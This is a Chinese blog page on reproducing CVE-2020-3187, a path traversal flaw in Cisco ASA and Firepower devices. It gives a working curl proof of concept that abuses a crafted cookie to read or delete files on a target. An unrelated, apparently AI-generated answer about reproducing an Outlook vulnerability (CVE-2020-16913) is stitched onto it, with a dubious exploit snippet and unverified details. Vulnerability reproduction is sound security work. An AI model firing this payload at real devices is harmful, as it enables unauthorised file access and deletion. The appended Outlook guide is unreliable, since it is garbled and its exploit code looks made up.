CVE-2020-3187漏洞复现

本文详细介绍了CVE-2020-3187漏洞,涉及Cisco Firepower Threat Defense和Adaptive Security Appliances Software。该漏洞允许攻击者通过发送特制HTTP请求进行路径遍历,从而读取或删除系统敏感信息。文章包括漏洞简介、漏洞利用方法的POC演示以及厂商提供的修复措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CVE-2020-3187

漏洞简介

Cisco Firepower Threat Defense(FTD)和Cisco Adaptive Security Appliances Software(ASA Software)都是美国思科(Cisco)公司的产品。Cisco Firepower Threat Defense是一套提供下一代防火墙服务的统一软件。Cisco Adaptive Security Appliances Software是一套防火墙和网络安全平台。该平台提供了对数据和网络资源的高度安全的访问等功能。 Cisco Firepower Threat Defense和Adaptive Security Appliances Software存在路径遍历漏洞,该漏洞源于程序未对HTTP URL进行正确的输入验证。攻击者可通过发送带有目录遍历序列的特制HTTP请求利用该漏洞读取并删除系统上的敏感信息。

漏洞利用

POC

 curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html

https:

<think>好的,我需要帮助用户复现CVE-2020-16913漏洞。首先,我要确认这个漏洞的具体信息。CVE-2020-16913是Microsoft Outlook的一个远程代码执行漏洞,由恶意特制文件触发。用户需要搭建实验环境并进行步骤复现。 首先,查阅资料,确认漏洞影响的版本。根据微软的公告,该漏洞影响Outlook 2010到2019的多个版本,所以实验环境需要安装这些版本中的一个,比如Office 2016。可能需要使用Windows 10作为操作系统,并安装受影响的Outlook版本。 接下来,搭建环境可能需要虚拟机,比如VMware或VirtualBox,安装Windows 10和Office 2016。确保系统没有安装2020年10月的安全更新,因为该补丁修复了这个漏洞。需要关闭自动更新,或者回滚到更新前的状态。 然后是漏洞利用部分。这个漏洞通过特制的文件触发,可能需要构造一个恶意的Outlook文件(如.msg或.rft)。根据公开的信息,漏洞涉及Rich Text Format (RTF)解析中的内存损坏问题。用户需要获取或编写PoC(概念验证)代码,生成恶意文件。可能需要参考已有的漏洞分析或利用代码,比如Exploit-DB或GitHub上的资源。 步骤可能包括:创建恶意RTF文件,通过邮件或其他方式发送到目标Outlook,当用户预览或打开该文件时触发漏洞。需要配置Outlook的安全设置,可能降低防护以允许漏洞触发,比如禁用受保护的视图。 需要注意的事项包括:实验应在隔离环境中进行,避免影响真实系统;确保遵守法律和道德准则;可能需要调试工具如WinDbg来分析崩溃和内存转储,确认漏洞触发成功。 另外,用户可能遇到的问题包括环境配置错误、补丁未正确卸载、PoC文件构造不正确等。需要指导用户如何验证漏洞是否存在,例如检查系统日志或使用漏洞扫描工具。 最后,生成相关问题,帮助用户进一步理解相关漏洞复现方法,比如如何分析漏洞的根本原因,防护措施,或其他相关CVE复现方法。</think>### CVE-2020-16913漏洞复现步骤 CVE-2020-16913是Microsoft Outlook的远程代码执行漏洞,攻击者通过构造恶意文件诱导用户预览或打开,可触发内存损坏并执行任意代码[^1]。以下是复现步骤: --- #### **1. 实验环境搭建** - **操作系统**:Windows 10(建议虚拟机环境,如VMware/VirtualBox) - **软件版本**:安装未修复该漏洞的Microsoft Outlook版本: - Outlook 2010/2013/2016/2019(版本需低于2020年10月安全更新) - **配置要求**: 1. 关闭Outlook自动更新(防止补丁修复漏洞) 2. 禁用Outlook“受保护的视图”(允许直接加载外部内容) --- #### **2. 漏洞触发条件** - 用户需通过邮件接收恶意构造的`.rtf`或`.msg`文件,并执行以下操作之一: - 预览邮件内容 - 直接打开附件文件 --- #### **3. 复现步骤** **步骤1:生成恶意文件** 1. 构造特制的Rich Text Format(RTF)文件,利用Outlook解析漏洞触发内存损坏。 - 可参考公开PoC代码(如GitHub仓库中的`CVE-2020-16913.py`)生成恶意文件[^2]。 - 示例代码片段: ```python # 生成恶意RTF头部,包含畸形对象指针 rtf_header = b'{\\rtf1\\ansi\\ansicpg1252\\fromhtml{\\*\htmltag}' exploit_payload = b'<img src="x:\\localhost\\C$\\...\\恶意DLL路径">' # 触发路径解析漏洞 ``` **步骤2:发送恶意文件** 1. 将生成的`.rtf`文件通过邮件发送至目标Outlook账户,或直接放置于共享目录诱导用户打开。 **步骤3:触发漏洞** 1. 在目标主机使用Outlook打开邮件或附件。 2. 观察行为: -漏洞触发成功,将导致内存越界写入,可能引发进程崩溃(如`OUTLOOK.EXE`停止响应)。 - 结合调试工具(如WinDbg)分析崩溃时的寄存器状态,确认EIP控制权获取情况。 --- #### **4. 关键验证点** - **漏洞验证**:通过崩溃地址确认是否触发漏洞。例如,若`EIP`指向可控内存区域,则证明漏洞可利用。 - **防护绕过**:需关闭Outlook的“受保护视图”和“附件安全检查”功能[^3]。 --- #### **5. 修复建议** - 安装微软2020年10月安全更新(KB4486740/KB4486745)[^4]。 - 启用Outlook的“阻止外部内容”策略。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

初岄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值